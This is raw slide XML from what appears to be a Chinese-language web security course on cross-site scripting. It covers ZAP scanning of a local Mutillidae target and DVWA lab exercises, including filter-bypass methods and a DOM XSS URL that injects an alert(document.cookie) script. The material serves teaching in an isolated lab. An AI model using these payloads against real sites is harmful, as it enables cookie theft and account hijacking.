              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pP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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a: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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主界面中，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>点击Automated Scan按钮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，进入</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Automated Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>界面。</a:t>
            </a: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lang="zh-CN"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endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>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r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL to attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中填写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.66.133/mutillidae/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>点击攻击按钮，开始进行自动检测。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="1" kern="10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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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2"/>
          <a:srcRect r="-402" b="26856"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1823085" y="2166620"/>
            <a:ext cx="7291070" cy="360680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498475" y="1325245"/>
            <a:ext cx="10972165" cy="1409700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">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r>
              <a:rPr altLang="zh-CN" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在name上，分别注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>种攻击载荷进行攻击，都能弹出用户的Cookie值，</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>说明采用双写绕过攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>大小写混淆绕过攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</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img标签进行绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2300" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的方法都有效。</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任务实施四：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析medium级别的存储型XSS源代码</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3938270" y="2790825"/>
            <a:ext cx="4320000" cy="1408921"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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98475" y="1325245"/>
            <a:ext cx="10972165" cy="45085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2"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6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2314575" y="1866900"/>
            <a:ext cx="7560000" cy="4472583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498475" y="1325245"/>
            <a:ext cx="11160760" cy="272351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、查看源代码</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00000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct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没有任何保护措施，一切都可以进行。</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endParaRPr lang="en-US" altLang="zh-CN"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ct val="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2147482543"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868295" y="1938655"/>
            <a:ext cx="6499225" cy="1384300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498475" y="1325245"/>
            <a:ext cx="11160760" cy="177673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① 页面测试</a:t>
            </a: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en-US" altLang="zh-CN" sz="2800" b="1"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在下拉列表框中，选择“English”，再点击“Select”按钮，这时，浏览器地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>栏</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的内容为：http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English</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7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071245" y="3219450"/>
            <a:ext cx="10080000" cy="457634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498475" y="1325245"/>
            <a:ext cx="11160760" cy="175768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② </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>default参数</a:t>
            </a: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en-US" altLang="zh-CN" sz="2800" b="1"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用“&lt;script&gt;alert(document.cookie);&lt;/script&gt;”替换“English”。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=&lt;script&gt;alert(document.cookie);&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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071245" y="3190875"/>
            <a:ext cx="10080000" cy="457634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498475" y="1325245"/>
            <a:ext cx="11160760" cy="136525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③ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>转到地址栏指向的网址</a:t>
            </a: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en-US" altLang="zh-CN" sz="2800" b="1"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可以看到，</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>弹出用户的Cookie值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>脚本被执行了！</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328545" y="2738120"/>
            <a:ext cx="7560000" cy="3759162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498475" y="1325245"/>
            <a:ext cx="11160760" cy="136525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、漏洞攻击</a:t>
            </a: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④ 查看页面元素</a:t>
            </a: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en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以看到，页面中嵌入了我们编写的js代码。</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任务实施五：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>low级别的DOM型XSS漏洞利用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66545" y="2700020"/>
            <a:ext cx="9000000" cy="3984227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成Low、Medium和High级别的反射型XSS攻击。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成Low、Medium级别的存储型XSS攻击。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成Low级别的DOM型XSS攻击。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pP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67040"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1903730" y="2428240"/>
          <a:ext cx="8549640" cy="3762375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1138555"/>
                <a:gridCol w="4543425"/>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项目名称：6.6 XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>跨站脚本漏洞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XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>跨站脚本漏洞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l">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>XSS跨站脚本漏洞利用和防御措施</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:sym typeface="+mn-ea"/>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3" name="表格 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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lang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>6.6 XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>跨站脚本漏洞</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="1853381"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>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6" name="矩形 5"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7"/>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12" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>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571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>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480060" y="1356995"/>
            <a:ext cx="11070590" cy="2423160"/>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、使用自动扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
